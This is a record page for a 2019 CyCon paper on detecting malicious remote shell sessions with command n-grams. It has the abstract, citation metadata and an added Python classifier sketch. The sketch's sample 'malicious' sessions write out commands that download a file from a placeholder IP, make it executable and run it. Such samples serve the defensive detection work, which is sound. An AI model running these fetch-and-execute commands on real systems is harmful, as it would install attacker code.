Detection of Malicious Remote Shell Sessions

Authors: Pierre Dumont, Roland Meier, David Gugelmann, and Vincent Lenders
2019 11th International Conference on Cyber Conflict (CyCon)


Remote shell sessions via protocols such as SSH are essential for managing systems, deploying applications, and running experiments. However, combined with weak passwords or flaws in the authentication process, remote shell access becomes a major security risk, as it allows an attacker to run arbitrary commands in the name of an impersonated user or even a system administrator. For example, remote shells of weakly protected systems are often exploited in order to build large botnets, to send spam emails, or to launch distributed denial of service attacks. Also, malicious insiders in organizations often use shell sessions to access and transfer restricted data. In this work, we tackle the problem of detecting malicious shell sessions based on session logs, i.e., recorded sequences of commands that were executed over time. Our approach is to classify sessions as benign or malicious by analyzing the sequence of commands that the shell users executed. We model such sequences of commands as n-grams and use them as features to train a supervised machine learning classifier. Our evaluation, based on freely available data and data from our own honeypot infrastructure, shows that the classifier reaches a true positive rate of 99.4% and a true negative rate of 99.7% after observing only four shell commands.
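As an added illustration of the approach the abstract describes (not code from the paper or its authors), the sketch below turns the command sequence of a session into n-grams and classifies a session from its first four commands. The abstract does not name the classifier, so a small multinomial naive Bayes is used here as a stand-in; the training sessions, the choice to drop command arguments, and all function and class names are assumptions made for this example.

```python
import math
from collections import Counter

# Constructed sample sessions (not data from the paper or its honeypots).
TRAIN = [
    (["ls -la", "cd /var/www", "git pull", "systemctl restart nginx"], "benign"),
    (["cd project", "vim main.py", "python main.py", "git commit"], "benign"),
    (["df -h", "tail /var/log/syslog", "ls", "less notes.txt"], "benign"),
    (["uname -a", "cat /proc/cpuinfo", "wget http://198.51.100.7/bin",
      "chmod +x bin", "./bin"], "malicious"),
    (["cd /tmp", "wget http://198.51.100.7/a.sh", "chmod 777 a.sh",
      "sh a.sh", "rm a.sh"], "malicious"),
    (["uname -a", "free -m", "cd /tmp", "curl -O http://198.51.100.7/m",
      "chmod +x m"], "malicious"),
]

def command_ngrams(commands, n_max=2):
    """n-grams (n = 1..n_max) over command names; arguments are dropped (assumption)."""
    names = [c.split()[0] for c in commands if c.strip()]
    return [" ".join(names[i:i + n])
            for n in range(1, n_max + 1)
            for i in range(len(names) - n + 1)]

class NgramNaiveBayes:
    """Multinomial naive Bayes with add-one smoothing (stand-in classifier)."""
    def fit(self, data):
        self.priors = Counter(label for _, label in data)
        self.counts = {label: Counter() for label in self.priors}
        for commands, label in data:
            self.counts[label].update(command_ngrams(commands))
        self.vocab = set().union(*self.counts.values())
        return self

    def predict(self, commands):
        total = sum(self.priors.values())
        scores = {}
        for label, cnt in self.counts.items():
            denom = sum(cnt.values()) + len(self.vocab) + 1  # +1 for unseen n-grams
            scores[label] = math.log(self.priors[label] / total) + sum(
                math.log((cnt[g] + 1) / denom) for g in command_ngrams(commands))
        return max(scores, key=scores.get)

def classify_prefix(model, commands, k=4):
    """Classify a session from its first k commands only."""
    return model.predict(commands[:k])

if __name__ == "__main__":
    model = NgramNaiveBayes().fit(TRAIN)
    print(classify_prefix(model, ["cd /tmp", "wget http://203.0.113.9/x", "chmod +x x", "./x", "rm x"]))
```

With so few constructed sessions the output only shows the mechanics; it says nothing about the detection rates reported in the abstract.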




	isbn = {978-9949-9904-5-0},
	doi = {10.23919/CYCON.2019.8757163},
	year = {2019-05},
	booktitle = {2019 11th International Conference on Cyber Conflict (CyCon)},
	type = {Conference Paper},
	author = {Dumont, Pierre and Meier, Roland and Gugelmann, David and Lenders, Vincent},
	size = {20 p.},
	issn = {2325-5366},
	keywords = {malware; botnets; machine learning; attribution; digital forensics; digital trust; authentication},
	language = {en},
	address = {Piscataway, NJ},
	publisher = {IEEE},
	title = {Detection of Malicious Remote Shell Sessions},
	PAGES = {8757163},
	Note = {11th Annual International Conference on Cyber Conflict (CyCon) - Silent Battle; Conference Location: Tallinn, Estonia; Conference Date: May 28-31, 2019}

Research Collection: 20.500.11850/366466